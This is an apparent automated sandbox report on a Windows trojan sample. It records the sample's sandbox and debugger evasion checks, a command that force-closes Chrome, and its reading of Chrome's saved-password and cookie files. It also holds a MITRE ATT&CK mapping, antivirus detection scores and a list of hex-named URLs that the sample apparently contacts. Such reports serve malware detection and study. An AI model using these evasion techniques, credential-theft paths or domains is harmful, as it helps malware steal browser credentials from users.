DriverSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}
Source: 26FF190E7AE0F7C7.exe, 00000006.00000002.426166948.0000000002B1C000.00000004.00000001.sdmp	Binary or memory string: Microsoft Hyper-V Generation CounterSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}s
Source: 26FF190E7AE0F7C7.exe, 00000006.00000003.366953663.0000000002A01000.00000004.00000001.sdmp, 26FF190E7AE0F7C7.exe, 00000007.00000003.374949364.0000000002C41000.00000004.00000001.sdmp	Binary or memory string: NetPCIIntel(R) 82574L Gigabit Network Connection{4d36e972-e325-11ce-bfc1-08002be10318}LSI Adapter, SAS 3000 series, 8-port with 1068SCSIAdapterPCI{4d36e97b-e325-11ce-bfc1-08002be10318}PCI-to-PCI BridgeSystemPCI{4d36e97d-e325-11ce-bfc1-08002be10318}Local Print QueuePrintQueueSWDMicrosoft XPS Document Writer{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Local Print QueuePrintQueueSWDRoot Print Queue{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Volume ManagerSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Generic Non-PnP MonitorMonitorDISPLAY{4d36e96e-e325-11ce-bfc1-08002be10318}WAN Miniport (PPPOE)NetSWDWAN Miniport (PPPOE){4d36e972-e325-11ce-bfc1-08002be10318}PCI BusSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Hyper-V Generation CounterSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Basic Display DriverSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}USB Input DeviceHIDClassUSB{745a17a0-74d3-11d0-b6fe-00a0c90f57da}VolumeVolumeSTORAGE{71a27cdd-812a-11d0-bec7-08002be2092f}USB Root Hub (USB 3.0)USBUSB{36fc9e60-c465-11cf-8056-444553540000}Generic software deviceSoftwareDeviceSWDMicrosoft RRAS Root Enumerator{62f9c741-b25a-46ce-b54c-9bccce08b6f2}WAN Miniport (PPTP)NetSWDWAN Miniport (PPTP){4d36e972-e325-11ce-bfc1-08002be10318}High precision event timerSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}WAN Miniport (IKEv2)NetSWDWAN Miniport (IKEv2){4d36e972-e325-11ce-bfc1-08002be10318}Composite Bus EnumeratorSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Virtual Drive EnumeratorSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Storage Spaces ControllerSCSIAdapterROOT{4d36e97b-e325-11ce-bfc1-08002be10318}System CMOS/real time clockSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Kernel Debug Network AdapterNetROOTMicrosoft Kernel Debug Network Adapter{4d36e972-e325-11ce-bfc1-08002be10318}Standard PS/2 KeyboardKeyboardACPI{4d36e96b-e325-11ce-bfc1-08002be10318}USB Input DeviceHIDClassUSB{745a17a0-74d3-11d0-b6fe-00a0c90f57da}Local Print QueuePrintQueue
Source: 26FF190E7AE0F7C7.exe, 00000006.00000003.368253864.0000000002B19000.00000004.00000001.sdmp	Binary or memory string: {72631e54-78a4-11d0-bcf7-00aa00b7b32a}Intel(R) 82574L Gigabit Network ConnectionNetPCIIntel(R) 82574L Gigabit Network Connection{4d36e972-e325-11ce-bfc1-08002be10318}LSI Adapter, SAS 3000 series, 8-port with 1068SCSIAdapterPCI{4d36e97b-e325-11ce-bfc1-08002be10318}PCI-to-PCI BridgeSystemPCI{4d36e97d-e325-11ce-bfc1-08002be10318}Local Print QueuePrintQueueSWDMicrosoft XPS Document Writer{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Local Print QueuePrintQueueSWDRoot Print Queue{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Volume ManagerSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Generic Non-PnP MonitorMonitorDISPLAY{4d36e96e-e325-11ce-bfc1-08002be10318}WAN Miniport (PPPOE)NetSWDWAN Miniport (PPPOE){4d36e972-e325-11ce-bfc1-08002be10318}PCI BusSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Hyper-V Generation CounterSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}s
Source: 26FF190E7AE0F7C7.exe, 00000006.00000003.396326945.0000000003EC7000.00000004.00000001.sdmp, 26FF190E7AE0F7C7.exe, 00000007.00000003.374949364.0000000002C41000.00000004.00000001.sdmp	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: 26FF190E7AE0F7C7.exe, 00000006.00000003.389162844.0000000003E81000.00000004.00000001.sdmp	Binary or memory string: NetPCIIntel(R) 82574L Gigabit Network Connection{4d36e972-e325-11ce-bfc1-08002be10318}LSI Adapter, SAS 3000 series, 8-port with 1068SCSIAdapterPCI{4d36e97b-e325-11ce-bfc1-08002be10318}PCI-to-PCI BridgeSystemPCI{4d36e97d-e325-11ce-bfc1-08002be10318}Local Print QueuePrintQueueSWDMicrosoft XPS Document Writer{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Local Print QueuePrintQueueSWDRoot Print Queue{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Volume ManagerSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Generic Non-PnP MonitorMonitorDISPLAY{4d36e96e-e325-11ce-bfc1-08002be10318}WAN Miniport (PPPOE)NetSWDWAN Miniport (PPPOE){4d36e972-e325-11ce-bfc1-08002be10318}PCI BusSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Hyper-V Generation CounterSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}
Source: 26FF190E7AE0F7C7.exe, 00000007.00000002.385623202.000000000295C000.00000004.00000001.sdmp	Binary or memory string: Microsoft Hyper-V Generation CounterSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}{K
Source: 26FF190E7AE0F7C7.exe, 00000007.00000003.375009282.0000000002959000.00000004.00000001.sdmp	Binary or memory string: {72631e54-78a4-11d0-bcf7-00aa00b7b32a}Intel(R) 82574L Gigabit Network ConnectionNetPCIIntel(R) 82574L Gigabit Network Connection{4d36e972-e325-11ce-bfc1-08002be10318}LSI Adapter, SAS 3000 series, 8-port with 1068SCSIAdapterPCI{4d36e97b-e325-11ce-bfc1-08002be10318}PCI-to-PCI BridgeSystemPCI{4d36e97d-e325-11ce-bfc1-08002be10318}Local Print QueuePrintQueueSWDMicrosoft XPS Document Writer{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Local Print QueuePrintQueueSWDRoot Print Queue{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Volume ManagerSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Generic Non-PnP MonitorMonitorDISPLAY{4d36e96e-e325-11ce-bfc1-08002be10318}WAN Miniport (PPPOE)NetSWDWAN Miniport (PPPOE){4d36e972-e325-11ce-bfc1-08002be10318}PCI BusSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Hyper-V Generation CounterSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}{K
Source: SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe, 00000000.00000002.368315810.000000000079A000.00000004.00000020.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllh
Source: 26FF190E7AE0F7C7.exe, 00000007.00000002.382543706.000000000019B000.00000004.00000010.sdmp	Binary or memory string: VMware Virtual disk 2.0
Source: 26FF190E7AE0F7C7.exe, 00000007.00000002.382543706.000000000019B000.00000004.00000010.sdmp	Binary or memory string: VMware
Source: ecv743B.tmp.11.dr	Binary or memory string: https://arc.msn.com/v3/Delivery/Placement?pubid=da63df93-3dbc-42ae-a505-b34988683ac7&pid=314559&adm=2&w=1&h=1&wpx=1&hpx=1&fmt=json&cltp=app&dim=le&rafb=0&nct=1&pm=1&cfmt=text,image,poly&sft=jpeg,png,gif&topt=1&poptin=0&localid=w:BE8AB8DF-DCD1-3523-4A95-3A04EAFF1CBA&ctry=US&time=20200930T152709Z&lc=en-US&pl=en-US&idtp=mid&uid=b029da70-c67b-4a7e-9bd5-517f7e302ed9&aid=00000000-0000-0000-0000-000000000000&ua=WindowsShellClient%2F9.0.40929.0%20%28Windows%29&asid=48d2e04dceaa40b2b5695ef3984d7312&ctmode=MultiSession&arch=x64&cdm=1&cdmver=10.0.17134.1&devfam=Windows.Desktop&devform=Unknown&devosver=10.0.17134.1&disphorzres=1280&dispsize=17.1&dispvertres=1024&isu=0&lo=663574&metered=false&nettype=ethernet&npid=sc-314559&oemName=VMware%2C%20Inc.&oemid=VMware%2C%20Inc.&ossku=Professional&smBiosDm=VMware7%2C1&tl=2&tsu=663574&waasBldFlt=1&waasCfgExp=1&waasCfgSet=1&waasRetail=1&waasRing=
Source: 26FF190E7AE0F7C7.exe, 00000006.00000003.367213379.0000000002A2D000.00000004.00000001.sdmp, 26FF190E7AE0F7C7.exe, 00000007.00000002.385965018.0000000002C6D000.00000004.00000001.sdmp	Binary or memory string: Motherboard resourcesSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft AC AdapterBatteryACPI{72631e54-78a4-11d0-bcf7-00aa00b7b32a}Intel(R) 82574L Gigabit Network ConnectionNetPCIIntel(R) 82574L Gigabit Network Connection{4d36e972-e325-11ce-bfc1-08002be10318}LSI Adapter, SAS 3000 series, 8-port with 1068SCSIAdapterPCI{4d36e97b-e325-11ce-bfc1-08002be10318}PCI-to-PCI BridgeSystemPCI{4d36e97d-e325-11ce-bfc1-08002be10318}Local Print QueuePrintQueueSWDMicrosoft XPS Document Writer{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Local Print QueuePrintQueueSWDRoot Print Queue{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Volume ManagerSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Generic Non-PnP MonitorMonitorDISPLAY{4d36e96e-e325-11ce-bfc1-08002be10318}WAN Miniport (PPPOE)NetSWDWAN Miniport (PPPOE){4d36e972-e325-11ce-bfc1-08002be10318}PCI BusSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Hyper-V Generation CounterSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Basic Display DriverSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}USB Input DeviceHIDClassUSB{745a17a0-74d3-11d0-b6fe-00a0c90f57da}VolumeVolumeSTORAGE{71a27cdd-812a-11d0-bec7-08002be2092f}USB Root Hub (USB 3.0)USBUSB{36fc9e60-c465-11cf-8056-444553540000}Generic software deviceSoftwareDeviceSWDMicrosoft RRAS Root Enumerator{62f9c741-b25a-46ce-b54c-9bccce08b6f2}WAN Miniport (PPTP)NetSWDWAN Miniport (PPTP){4d36e972-e325-11ce-bfc1-08002be10318}High precision event timerSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}WAN Miniport (IKEv2)NetSWDWAN Miniport (IKEv2){4d36e972-e325-11ce-bfc1-08002be10318}Composite Bus EnumeratorSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Virtual Drive EnumeratorSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Storage Spaces ControllerSCSIAdapterROOT{4d36e97b-e325-11ce-bfc1-08002be10318}System CMOS/real time clockSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Kernel Debug Network AdapterNetROOTMicrosoft Kernel Debug Network Adapter{4d36e972-e325-11ce-bfc1-08002be10318}Standard PS/2 KeyboardKeyboardACPI{4d36e96b-e325-11ce-bfc1-08002be10318}USB Input DeviceHIDClassUSB{745a17a0-74d3-11d0-b6fe-00a0c90f57da}Local Print QueuePrintQueueSWDMicrosoft Print to PDF{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}
Source: 26FF190E7AE0F7C7.exe, 00000006.00000003.396326945.0000000003EC7000.00000004.00000001.sdmp	Binary or memory string: {4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Hyper-V Generation CounterSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}p

Source: C:\Users\user\AppData\Roaming\1618257864703.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging:

Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)

Show sources

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe

Code function: 0_2_1001A050 GetCurrentProcess,CheckRemoteDebuggerPresent,

0_2_1001A050

Hides threads from debuggers

Show sources

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe

Thread information set: HideFromDebugger

Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe	Process queried: DebugObjectHandle	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe	Process queried: DebugFlags	Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe

Code function: 0_2_1000F05C IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

0_2_1000F05C

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe

Code function: 0_2_00408D68 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

0_2_00408D68

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe	Code function: 0_2_00404E19 mov eax, dword ptr fs:[00000030h]	0_2_00404E19
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe	Code function: 0_2_10019E40 mov eax, dword ptr fs:[00000030h]	0_2_10019E40
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe	Code function: 0_2_10019E70 mov eax, dword ptr fs:[00000030h]	0_2_10019E70
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe	Code function: 0_2_10019E70 mov eax, dword ptr fs:[00000030h]	0_2_10019E70
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe	Code function: 0_2_10019ED0 mov eax, dword ptr fs:[00000030h]	0_2_10019ED0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe	Code function: 0_2_10019ED0 mov eax, dword ptr fs:[00000030h]	0_2_10019ED0
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe	Code function: 0_2_10019F30 mov eax, dword ptr fs:[00000030h]	0_2_10019F30
Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	Code function: 6_2_10019E40 mov eax, dword ptr fs:[00000030h]	6_2_10019E40
Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	Code function: 6_2_10019E70 mov eax, dword ptr fs:[00000030h]	6_2_10019E70
Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	Code function: 6_2_10019E70 mov eax, dword ptr fs:[00000030h]	6_2_10019E70
Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	Code function: 6_2_10019ED0 mov eax, dword ptr fs:[00000030h]	6_2_10019ED0
Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	Code function: 6_2_10019ED0 mov eax, dword ptr fs:[00000030h]	6_2_10019ED0
Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	Code function: 6_2_10019F30 mov eax, dword ptr fs:[00000030h]	6_2_10019F30

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe

Code function: 0_2_1000E96E GetProcessHeap,GetProcessHeap,HeapAlloc,GetVersionExA,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,__heap_term,__RTC_Initialize,GetCommandLineA,___crtGetEnvironmentStringsA,__ioinit,__mtterm,__setargv,__setenvp,__cinit,__ioterm,

0_2_1000E96E

Source: C:\Windows\SysWOW64\taskkill.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe	Code function: 0_2_1000F05C IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_1000F05C
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe	Code function: 0_2_100153B4 SetUnhandledExceptionFilter,__encode_pointer,	0_2_100153B4
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe	Code function: 0_2_100153D6 __decode_pointer,SetUnhandledExceptionFilter,	0_2_100153D6
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe	Code function: 0_2_10018473 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,RtlUnwind,	0_2_10018473
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe	Code function: 0_2_1000E4AD _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_1000E4AD
Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	Code function: 6_2_1000F05C IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	6_2_1000F05C
Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	Code function: 6_2_100153B4 SetUnhandledExceptionFilter,__encode_pointer,	6_2_100153B4
Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	Code function: 6_2_100153D6 __decode_pointer,SetUnhandledExceptionFilter,	6_2_100153D6
Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	Code function: 6_2_10018473 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,RtlUnwind,	6_2_10018473
Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	Code function: 6_2_1000E4AD _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	6_2_1000E4AD
Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe	Code function: 21_2_0001461F SetUnhandledExceptionFilter,	21_2_0001461F
Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe	Code function: 21_2_00011C57 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	21_2_00011C57
Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe	Code function: 21_2_0001631F __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	21_2_0001631F
Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe	Code function: 21_2_0001373A _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	21_2_0001373A

Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im chrome.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im chrome.exe

Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe

Code function: 0_2_1001A150 InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateMutexA,GetLastError,

0_2_1001A150

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe

Code function: 0_2_100177FF cpuid

0_2_100177FF

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe	Code function: GetLocaleInfoA,	0_2_10017D50
Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	Code function: GetLocaleInfoA,	6_2_10017D50
Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe	Code function: GetLocaleInfoA,	21_2_00017189

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe

Code function: 0_2_100197E0 SetupDiGetDeviceRegistryPropertyA,GetLastError,_memset,SetupDiGetDeviceRegistryPropertyA,

0_2_100197E0

Source: C:\Windows\SysWOW64\msiexec.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe

Code function: 0_2_100152B4 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,

0_2_100152B4

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe

Code function: 0_2_00401000 GetVersionExA,GetVersionExA,GetVersionExA,GetVersionExA,

0_2_00401000

Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information:

Tries to harvest and steal browser information (history, passwords, etc)

Show sources

Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\hihistory	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Preferences	Jump to behavior

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Replication Through Removable Media1	Windows Management Instrumentation1	DLL Side-Loading1	DLL Side-Loading1	Disable or Modify Tools1	OS Credential Dumping1	System Time Discovery11	Replication Through Removable Media1	Archive Collected Data1	Exfiltration Over Other Network Medium	Encrypted Channel2	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Native API1	Application Shimming1	Application Shimming1	Deobfuscate/Decode Files or Information1	Input Capture1	Peripheral Device Discovery11	Remote Desktop Protocol	Man in the Browser1	Exfiltration Over Bluetooth	Non-Application Layer Protocol1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Browser Extensions1	Process Injection11	Obfuscated Files or Information2	Security Account Manager	File and Directory Discovery3	SMB/Windows Admin Shares	Data from Local System1	Automated Exfiltration	Application Layer Protocol1	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Bootkit1	Logon Script (Mac)	Install Root Certificate2	NTDS	System Information Discovery57	Distributed Component Object Model	Input Capture1	Scheduled Transfer	Protocol Impersonation	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Software Packing1	LSA Secrets	Query Registry2	SSH	Clipboard Data1	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	DLL Side-Loading1	Cached Domain Credentials	Security Software Discovery451	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Masquerading1	DCSync	Virtualization/Sandbox Evasion13	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Virtualization/Sandbox Evasion13	Proc Filesystem	Process Discovery3	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	Process Injection11	/etc/passwd and /etc/shadow	Remote System Discovery11	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction
Supply Chain Compromise	AppleScript	At (Windows)	At (Windows)	Bootkit1	Network Sniffing	System Network Configuration Discovery1	Taint Shared Content	Local Data Staging	Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol	File Transfer Protocols			Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe	75%	Virustotal		Browse
SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe	28%	Metadefender		Browse
SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe	65%	ReversingLabs	Win32.Trojan.Vigorf
SecuriteInfo.com.Trojan.Siggen12.33370.30028.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	28%	Metadefender		Browse
C:\Users\user\AppData\Local\Temp\26FF190E7AE0F7C7.exe	65%	ReversingLabs	Win32.Trojan.Vigorf
C:\Users\user\AppData\Local\Temp\MSI429C.tmp	0%	Metadefender		Browse
C:\Users\user\AppData\Local\Temp\MSI429C.tmp	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe	8%	Metadefender		Browse
C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe	3%	Metadefender		Browse
C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe	2%	ReversingLabs
C:\Users\user\AppData\Local\Temp\download\atl71.dll	3%	Metadefender		Browse
C:\Users\user\AppData\Local\Temp\download\atl71.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\download\dl_peer_id.dll	3%	Metadefender		Browse
C:\Users\user\AppData\Local\Temp\download\dl_peer_id.dll	0%	ReversingLabs

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label
http://61d347c728b2d94d.com/	0%	Avira URL Cloud	safe
http://55BE681FC6760236.com/o/	0%	Avira URL Cloud	safe
http://BDC347C728B2D94D.com/_1;	0%	Avira URL Cloud	safe
http://84b5a35d6e5335ef.com/info_old/w	0%	Avira URL Cloud	safe
http://back19e64ea00d6ecfe1.io/C	0%	Avira URL Cloud	safe
http://9ED2FEEA30C3CC5D.com/info_old/ddd9	0%	Avira URL Cloud	safe
http://back19e64ea00d6ecfe1.io/Y	0%	Avira URL Cloud	safe
https://deff.nelreports.net/api/report?cat=msn	0%	URL Reputation	safe
https://deff.nelreports.net/api/report?cat=msn	0%	URL Reputation	safe
https://deff.nelreports.net/api/report?cat=msn	0%	URL Reputation	safe
http://BDC347C728B2D94D.com/w	0%	Avira URL Cloud	safe
http://back19e64ea00d6ecfe1.io/info_old/w	0%	Avira URL Cloud	safe
http://61D53B5A4BC1AB86.com/ll	0%	Avira URL Cloud	safe
http://61D53B5A4BC1AB86.com/info_old/ddd	0%	Avira URL Cloud	safe
http://55BE681FC6760236.com/o/H	0%	Avira URL Cloud	safe
http://BDC347C728B2D94D.com/	0%	Avira URL Cloud	safe
